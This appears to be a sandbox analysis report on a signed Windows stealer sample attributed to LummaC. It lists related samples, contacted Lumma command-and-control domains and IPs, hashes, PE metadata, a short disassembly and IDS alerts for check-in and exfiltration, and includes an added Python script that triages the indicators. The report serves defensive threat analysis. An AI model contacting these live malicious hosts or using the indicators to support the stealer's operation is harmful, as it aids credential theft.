23.55.153.106 | 66DJ2wErLz.exe | malicious | LummaC |
23.55.153.106 | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Xmrig |
23.55.153.106 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc |
23.55.153.106 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar |
23.55.153.106 | wN8pQhRNnu.exe | malicious | LummaC |
23.55.153.106 | AZCFTWko2q.exe | malicious | LummaC |
23.55.153.106 | I37faEaz1K.exe | malicious | LummaC |
23.55.153.106 | YbJEkgZ4z5.exe | malicious | LummaC |
23.55.153.106 | 3cb2b5U8BR.exe | malicious | LummaC |
104.131.68.180 | java.exe | malicious | Tinba | uyhgqunqkxnx.pw/EiDQjNbWEQ/
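Added example, not part of the Joe Sandbox report: a Python script that parses the run-together cells of the IP table above (domain fused with country, ASN number fused with ASN name and the Malicious flag) and joins them with the IP-keyed associated-sample rows, then decides per contacted IP whether the address itself is worth carrying as a network IOC or only the domain is. The row data is transcribed from this report; the CDN ASN list, the verdict names and the rule that an IP seen with other malware families in earlier sandbox runs counts as reused infrastructure are this example's own assumptions.

```python
"""Triage the contacted-host tables of a Joe Sandbox report.

Added example; the rows below are transcribed from the report (constructed
inline so the script runs offline). CDN_ASNS and the verdict rules are
assumptions of this example, not data from the report.
"""
import re
from dataclasses import dataclass, field

# IP table rows exactly as the flattened report prints them:
# ip, "<domain><Country>", "<asn><ASN name><true|false>".
REPORT_IP_ROWS = [
    ("172.67.157.254", "lev-tolstoi.comUnited States", "13335CLOUDFLARENETUStrue"),
    ("45.77.249.79", "immureprech.bizUnited States", "20473AS-CHOOPAUSfalse"),
    ("23.55.153.106", "steamcommunity.comUnited States", "20940AKAMAI-ASN1EUfalse"),
    ("104.131.68.180", "deafeninggeh.bizUnited States", "14061DIGITALOCEAN-ASNUSfalse"),
]

# Associated-sample rows keyed by IP: (ip, sample name, "Threat Name" cell).
REPORT_ASSOCIATED = [
    ("172.67.157.254", "https://t.co/nq9BYOxCg9", "HTMLPhisher"),
    ("45.77.249.79", "UoktqWamLR.exe", "AZORult"),
    ("45.77.249.79", "RgZaLjgCto.exe", "Tinba"),
    ("45.77.249.79", "java.exe", "Tinba"),
    ("23.55.153.106", "sNWQ2gC6if.exe", "LummaC"),
    ("23.55.153.106", "66DJ2wErLz.exe", "LummaC"),
    ("23.55.153.106", "file.exe", "LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Xmrig"),
    ("23.55.153.106", "file.exe", "LummaC, Amadey, LummaC Stealer, Stealc"),
    ("23.55.153.106", "file.exe", "LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar"),
    ("23.55.153.106", "wN8pQhRNnu.exe", "LummaC"),
    ("23.55.153.106", "AZCFTWko2q.exe", "LummaC"),
    ("23.55.153.106", "I37faEaz1K.exe", "LummaC"),
    ("23.55.153.106", "YbJEkgZ4z5.exe", "LummaC"),
    ("23.55.153.106", "3cb2b5U8BR.exe", "LummaC"),
    ("104.131.68.180", "java.exe", "Tinba"),
]

# Assumption: ASNs whose addresses front many unrelated tenants, so an IP on
# them identifies the edge network rather than the adversary.
CDN_ASNS = {13335: "CLOUDFLARENET", 20940: "AKAMAI-ASN1"}

# A hostname is lowercase letters, digits, dots and hyphens; the country name
# that follows starts with an uppercase letter, which ends the match.
DOMAIN_COUNTRY_RE = re.compile(r"^([a-z0-9.-]+)(.*)$")
# Leading digits are the ASN, the trailing true/false is the Malicious flag,
# whatever sits between is the ASN name cell as printed.
ASN_ROW_RE = re.compile(r"^(\d+)(.*?)(true|false)$")


@dataclass
class Host:
    ip: str
    domain: str
    country: str
    asn: int
    asn_name: str
    malicious: bool
    families: set = field(default_factory=set)  # threat names from other runs


def parse_ip_row(ip, domain_country, asn_row):
    """Split the fused cells of one IP table row into a Host."""
    m = DOMAIN_COUNTRY_RE.match(domain_country)
    n = ASN_ROW_RE.match(asn_row)
    if not (m and n):
        raise ValueError(f"unparseable row for {ip}: {domain_country!r} / {asn_row!r}")
    return Host(ip, m.group(1), m.group(2), int(n.group(1)), n.group(2), n.group(3) == "true")


def split_families(threat_names):
    """'LummaC, Amadey, LummaC Stealer' -> {'LummaC', 'Amadey', 'LummaC Stealer'}."""
    return {t.strip() for t in threat_names.split(",") if t.strip()}


def build_hosts(ip_rows=REPORT_IP_ROWS, associated=REPORT_ASSOCIATED):
    """Parse the IP table and attach the threat families seen on each IP."""
    hosts = {ip: parse_ip_row(ip, dc, ar) for ip, dc, ar in ip_rows}
    for ip, _sample, threats in associated:
        if ip in hosts:
            hosts[ip].families |= split_families(threats)
    return hosts


def ip_verdict(host, this_family="LummaC"):
    """Return 'cdn', 'reused', 'dedicated' or 'unflagged' for one IP.

    Only 'dedicated' means the address itself is a usable IOC; otherwise
    block or hunt on the domain. Family names match by prefix so that
    'LummaC Stealer' counts as the same family as 'LummaC'.
    """
    if host.asn in CDN_ASNS:
        return "cdn"
    other = {f for f in host.families if not f.startswith(this_family)}
    if other:
        return "reused"
    return "dedicated" if host.malicious else "unflagged"


def iocs(hosts, this_family="LummaC"):
    """Per IP: (domain, verdict, sorted families seen on that IP in other runs)."""
    return {ip: (h.domain, ip_verdict(h, this_family), sorted(h.families))
            for ip, h in hosts.items()}


if __name__ == "__main__":
    for ip, (domain, verdict, fams) in iocs(build_hosts()).items():
        print(f"{ip:<16} {domain:<20} {verdict:<10} {', '.join(fams)}")
```

Run against this report every one of the four IPs comes out as cdn or reused, so the addresses are poor block-list entries and the domains are what to carry forward. 23.55.153.106 is the Akamai edge for steamcommunity.com, which the report marks not malicious even though ten other LummaC samples contacted it, so it is a hunting pivot rather than a block entry; the report's Malicious flag is true only for 172.67.157.254, and the LummaC history of immureprech.biz and deafeninggeh.biz is visible only in the domain-keyed table that follows, which is why the triage keys on the domain.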
Match | Associated Sample Name / URL | Detection | Threat Name | Context
deafeninggeh.biz | sNWQ2gC6if.exe | malicious | LummaC | 104.131.68.180
deafeninggeh.biz | 66DJ2wErLz.exe | malicious | LummaC | 45.77.249.79
deafeninggeh.biz | hpEAJnNwCB.exe | malicious | LummaC | 104.131.68.180
deafeninggeh.biz | DG55Gu1yGM.exe | malicious | LummaC | 45.77.249.79
deafeninggeh.biz | he55PbvM2G.exe | malicious | LummaC | 104.131.68.180
deafeninggeh.biz | SkaKk8Z1J0.exe | malicious | LummaC | 104.131.68.180
deafeninggeh.biz | N1sb7Ii2YD.exe | malicious | LummaC | 178.62.201.34
deafeninggeh.biz | file.exe | malicious | LummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, Xmrig | 104.131.68.180
deafeninggeh.biz | file.exe | malicious | LummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, Xmrig | 178.62.201.34
deafeninggeh.biz | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Xmrig | 104.131.68.180
immureprech.biz | sNWQ2gC6if.exe | malicious | LummaC | 104.131.68.180
immureprech.biz | 66DJ2wErLz.exe | malicious | LummaC | 178.62.201.34
immureprech.biz | hpEAJnNwCB.exe | malicious | LummaC |
                                                                                                                                                                                                                                    • 45.77.249.79
                                                                                                                                                                                                                                    DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.131.68.180
                                                                                                                                                                                                                                    he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 178.62.201.34
                                                                                                                                                                                                                                    SkaKk8Z1J0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 45.77.249.79
                                                                                                                                                                                                                                    N1sb7Ii2YD.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 178.62.201.34
                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                    • 178.62.201.34
                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                    • 104.131.68.180
                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                    • 104.131.68.180
                                                                                                                                                                                                                                    steamcommunity.comsNWQ2gC6if.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                    66DJ2wErLz.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, XmrigBrowse
                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                    hpEAJnNwCB.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.121.10.34
                                                                                                                                                                                                                                    DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.121.10.34
                                                                                                                                                                                                                                    he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.121.10.34
                                                                                                                                                                                                                                    SkaKk8Z1J0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.121.10.34
                                                                                                                                                                                                                                    N1sb7Ii2YD.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.121.10.34
                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                    • 104.121.10.34
                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                    • 104.121.10.34
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                    • 104.131.68.180
                                                                                                                                                                                                                                    • 45.77.249.79
                                                                                                                                                                                                                                    loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 172.67.157.254
                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                    • 104.131.68.180
                                                                                                                                                                                                                                    • 45.77.249.79
                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Poverty Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                    • 172.67.157.254
                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                    • 104.131.68.180
                                                                                                                                                                                                                                    • 45.77.249.79
                                                                                                                                                                                                                                    MeP66xi1AM.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                                                                                                    • 172.67.157.254
                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                    • 104.131.68.180
                                                                                                                                                                                                                                    • 45.77.249.79
                                                                                                                                                                                                                                    CapCut_12.0.4_Installer.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                    • 172.67.157.254
                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                    • 104.131.68.180
                                                                                                                                                                                                                                    • 45.77.249.79
                                                                                                                                                                                                                                    CapCut_12.0.4_Installer.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                    • 172.67.157.254
                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                    • 104.131.68.180
                                                                                                                                                                                                                                    • 45.77.249.79
No context
No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.350733016938632
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: ardware-v1.exe
File size: 3'487'960 bytes
MD5: c491ddba2ee7516cfc5d5b57ece509a2
SHA1: c0d068660dd74e890bf653a5c839e32314f6bca3
SHA256: 1a0b974102462f42d51ae78898fa59bcb9e399c9c3207d26ce0a503a1262f1e6
SHA512: e7cafad543df242d76230c678d6beb9c8a00db2c8ede995cfe459bea3f996b3395db55736f203d5e22e5ad72fe72c8737d251ffcd3cd166c2e91b65a1a5484f1
SSDEEP: 98304:832g6KeR8WvRXOE4yPaKDZ4UmyYl3RbB9p6pkYiXe6/hDDV1h2Yq0W/cVA:7lKeRDRXiOZ4U9E3hrU6YiXjDp2iA
TLSH: 70F58E3C414ACE8DE74BE169228717CF38ED60B6C54FB58393C8E898ED5398C98AC557
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........KY6.*7e.*7e.*7e.R4d.*7e.R2dL*7e.R3d.*7e..4d.*7e..3d.*7e..2d.*7e.R6d.*7e.*6e.*7eZ.?d.*7eZ..e.*7eZ.5d.*7eRich.*7e........PE..L..
Icon Hash: 5f796dd6ccd96926
Entrypoint: 0x6e4200
Entrypoint Section: .text
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x67600960 [Mon Dec 16 11:05:04 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 5b1cbf5ac6f122fc95a4de1a12dcfae0
Signature Valid: true
Signature Issuer: CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
Signature Validation Error: The operation completed successfully
Error Number: 0
Not Before: 22/10/2024 20:00:00
Not After: 23/10/2025 19:59:59
Subject Chain:
• CN=袁州区创新探索网络工作室（个体工商户）, O=袁州区创新探索网络工作室（个体工商户）, S=江西省, C=CN, OID.2.5.4.15=Business Entity, OID.1.3.6.1.4.1.311.60.2.1.3=CN, SERIALNUMBER=92360902MADYXP3F14
Version: 3
Thumbprint MD5: 03E83BDACA900DD003355CC8E662D9FA
Thumbprint SHA-1: CBF33B2C384509341A4D74C25B332DF2DF82B494
Thumbprint SHA-256: 522EC7DC5080E18BE2C2BDFEF1594B4167CD57D620ADEA28FF407784A49A3497
Serial: 334A8DC7BE701421BB5A00FEFCB26F50
Instruction
push ebp
mov ebp, esp
call 00007FAEE450E35Dh            ; entrypoint stub: jump into the real start routine
pop ebp
ret
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push 00000000h
call dword ptr [0071400Ch]        ; IAT call with a NULL argument
mov eax, dword ptr [ebp+08h]
push eax
call dword ptr [00714008h]        ; IAT call with the caller's first argument
push C0000409h                    ; 0xC0000409 = STATUS_STACK_BUFFER_OVERRUN
call dword ptr [00714010h]
push eax
call dword ptr [00714014h]        ; pattern is consistent with the MSVC CRT __raise_securityfailure sequence
nop
pop ebp
ret
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
sub esp, 00000324h                ; room for a CONTEXT / exception record on the stack
push 00000017h                    ; 0x17 = PF_FASTFAIL_AVAILABLE
call dword ptr [00714018h]        ; IAT call; pattern is consistent with IsProcessorFeaturePresent
test eax, eax
je 00007FAEE450E659h              ; no fast-fail support: fall through to the legacy report path
mov ecx, 00000002h                ; 2 = FAST_FAIL_STACK_COOKIE_CHECK_FAILURE
int 29h                           ; __fastfail: the process is terminated immediately
mov dword ptr [00723AD0h], eax    ; save the register state for the GS cookie failure report
mov dword ptr [00723ACCh], ecx
mov dword ptr [00723AC8h], edx
mov dword ptr [00723AC4h], ebx
mov dword ptr [00723AC0h], esi
mov dword ptr [00723ABCh], edi
                                                                                                                                                                                                                                    mov word ptr [00723AE8h], ss
                                                                                                                                                                                                                                    mov word ptr [00723ADCh], cs
                                                                                                                                                                                                                                    mov word ptr [00723AB8h], ds
                                                                                                                                                                                                                                    mov word ptr [00723AB4h], es
                                                                                                                                                                                                                                    mov word ptr [00723AB0h], fs
                                                                                                                                                                                                                                    mov word ptr [00723AACh], gs
                                                                                                                                                                                                                                    pushfd
                                                                                                                                                                                                                                    pop dword ptr [00723AE0h]
                                                                                                                                                                                                                                    mov eax, dword ptr [ebp+00h]
                                                                                                                                                                                                                                    mov dword ptr [00723AD4h], eax
                                                                                                                                                                                                                                    mov eax, dword ptr [ebp+04h]
                                                                                                                                                                                                                                    mov dword ptr [00723AD8h], eax
                                                                                                                                                                                                                                    lea eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                                    mov dword ptr [00723AE4h], eax
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x32238c | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x325000 | 0xeb55 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x34ee00 | 0x4ad8 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x334000 | 0x1e1c4 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3216e0 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x321620 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x314000 | 0x118 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x31265a | 0x312800 | 78205e5871918b833f6f9ddbca7a51e6 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x314000 | 0xe9d8 | 0xea00 | 5168e2efcb56f21388167389be17cb99 | False | 0.3250868055555556 | data | 4.593908806113169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x323000 | 0x1b80 | 0xa00 | ac347fa16904e0c00d845293aa065859 | False | 0.21328125 | data | 2.5718746421367604 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x325000 | 0xeb55 | 0xec00 | aa6b34ce96afaf2bbbcc9abeddfe13b7 | False | 0.8014929819915254 | data | 6.91975740920949 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x334000 | 0x1e1c4 | 0x1e200 | fa9cecbf249aa3bf5c0b36b41962e84a | False | 0.7237827411825726 | data | 6.844856432656225 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x325628 | 0x9ae0 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9888771186440678
RT_MENU | 0x32f108 | 0x29c | data | | | 0.5703592814371258
RT_DIALOG | 0x32f3a4 | 0x344 | data | | | 0.5418660287081339
RT_DIALOG | 0x32f6e8 | 0x2a0 | data | | | 0.5580357142857143
RT_DIALOG | 0x32f988 | 0x368 | data | | | 0.5263761467889908
RT_DIALOG | 0x32fcf0 | 0x3c4 | data | | | 0.5072614107883817
RT_DIALOG | 0x3300b4 | 0x4fc | data | | | 0.5047021943573667
RT_DIALOG | 0x3305b0 | 0x35c | data | | | 0.5395348837209303
RT_DIALOG | 0x33090c | 0x2d0 | data | | | 0.55
RT_DIALOG | 0x330bdc | 0x31c | data | | | 0.5527638190954773
RT_DIALOG | 0x330ef8 | 0x2e0 | data | | | 0.5679347826086957
RT_DIALOG | 0x3311d8 | 0x4d4 | data | | | 0.4919093851132686
RT_DIALOG | 0x3316ac | 0x308 | data | | | 0.5476804123711341
RT_DIALOG | 0x3319b4 | 0x3fc | data | | | 0.538235294117647
RT_STRING | 0x331db0 | 0x3c | data | | | 0.65
RT_STRING | 0x331dec | 0x180 | data | | | 0.5911458333333334
RT_STRING | 0x331f6c | 0x190 | data | | | 0.6025
RT_STRING | 0x3320fc | 0x178 | data | | | 0.6090425531914894
RT_STRING | 0x332274 | 0x170 | data | | | 0.6195652173913043
RT_STRING | 0x3323e4 | 0x190 | data | | | 0.605
RT_STRING | 0x332574 | 0x188 | data | | | 0.6071428571428571
RT_STRING | 0x3326fc | 0x1a8 | data | | | 0.5943396226415094
RT_STRING | 0x3328a4 | 0x190 | AmigaOS bitmap font "a", fc_YSize 25088, 22784 elements, 2nd "t", 3rd | | | 0.595
RT_STRING | 0x332a34 | 0xbc | data | | | 0.6595744680851063
RT_MESSAGETABLE | 0x332af0 | 0x498 | Matlab v4 mat-file (little endian) I, rows 55, columns 57, imaginary | | | 0.4923469387755102
RT_MESSAGETABLE | 0x332f88 | 0x550 | Matlab v4 mat-file (little endian) I, rows 54, columns 57, imaginary | | | 0.4838235294117647
RT_MESSAGETABLE | 0x3334d8 | 0x4ec | Matlab v4 mat-file (little endian) \211, rows 116, columns 121, imaginary | | | 0.4936507936507937
RT_GROUP_ICON | 0x3339c4 | 0x14 | data | | | 1.1
RT_MANIFEST | 0x3339d8 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727
DLL | Import
KERNEL32.dll | VirtualProtect, CloseHandle, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, EncodePointer, RaiseException, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, HeapAlloc, HeapValidate, GetSystemInfo, OutputDebugStringW, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileType, GetStringTypeW, LCMapStringW, GetProcessHeap, HeapFree, HeapReAlloc, HeapSize, HeapQueryInformation, WriteConsoleW, SetFilePointerEx, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, DecodePointer, CreateFileW
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-18T09:52:24.101138+0100 | 2058222 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz) | 1 | 192.168.2.5 | 51514 | 1.1.1.1 | 53 | UDP
2024-12-18T09:52:25.103064+0100 | 2058222 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz) | 1 | 192.168.2.5 | 51514 | 1.1.1.1 | 53 | UDP
2024-12-18T09:52:27.405887+0100 | 2058223 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI) | 1 | 192.168.2.5 | 49858 | 45.77.249.79 | 443 | TCP
2024-12-18T09:52:27.405887+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49858 | 45.77.249.79 | 443 | TCP
2024-12-18T09:52:27.407240+0100 | 2822521 | ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner) | 1 | 45.77.249.79 | 443 | 192.168.2.5 | 49858 | TCP
2024-12-18T09:52:28.314598+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.5 | 49858 | 45.77.249.79 | 443 | TCP
2024-12-18T09:52:28.314598+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49858 | 45.77.249.79 | 443 | TCP
2024-12-18T09:52:28.318715+0100 | 2058214 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz) | 1 | 192.168.2.5 | 61377 | 1.1.1.1 | 53 | UDP
2024-12-18T09:52:29.304741+0100 | 2058214 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz) | 1 | 192.168.2.5 | 61377 | 1.1.1.1 | 53 | UDP
2024-12-18T09:52:31.002104+0100 | 2058215 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI) | 1 | 192.168.2.5 | 49869 | 104.131.68.180 | 443 | TCP
2024-12-18T09:52:31.002104+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49869 | 104.131.68.180 | 443 | TCP
2024-12-18T09:52:31.004078+0100 | 2822521 | ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner) | 1 | 104.131.68.180 | 443 | 192.168.2.5 | 49869 | TCP
2024-12-18T09:52:31.418623+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.5 | 49869 | 104.131.68.180 | 443 | TCP
2024-12-18T09:52:31.418623+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49869 | 104.131.68.180 | 443 | TCP
2024-12-18T09:52:31.439534+0100 | 2058220 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) | 1 | 192.168.2.5 | 54285 | 1.1.1.1 | 53 | UDP
2024-12-18T09:52:31.751951+0100 | 2058218 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) | 1 | 192.168.2.5 | 49924 | 1.1.1.1 | 53 | UDP
2024-12-18T09:52:31.982468+0100 | 2058216 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) | 1 | 192.168.2.5 | 51044 | 1.1.1.1 | 53 | UDP
2024-12-18T09:52:32.204519+0100 | 2058236 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) | 1 | 192.168.2.5 | 56842 | 1.1.1.1 | 53 | UDP
2024-12-18T09:52:32.607672+0100 | 2058210 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou) | 1 | 192.168.2.5 | 55031 | 1.1.1.1 | 53 | UDP
2024-12-18T09:52:32.832362+0100 | 2058226 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) | 1 | 192.168.2.5 | 61235 | 1.1.1.1 | 53 | UDP
2024-12-18T09:52:34.686184+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49879 | 23.55.153.106 | 443 | TCP
2024-12-18T09:52:35.623619+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.5 | 49879 | 23.55.153.106 | 443 | TCP
2024-12-18T09:52:37.376405+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49886 | 172.67.157.254 | 443 | TCP
2024-12-18T09:52:38.082760+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.5 | 49886 | 172.67.157.254 | 443 | TCP
2024-12-18T09:52:38.082760+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49886 | 172.67.157.254 | 443 | TCP
2024-12-18T09:52:39.453862+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49892 | 172.67.157.254 | 443 | TCP
2024-12-18T09:52:40.496208+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.5 | 49892 | 172.67.157.254 | 443 | TCP
2024-12-18T09:52:40.496208+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49892 | 172.67.157.254 | 443 | TCP
2024-12-18T09:52:42.080645+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49899 | 172.67.157.254 | 443 | TCP
2024-12-18T09:52:42.809344+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.5 | 49899 | 172.67.157.254 | 443 | TCP
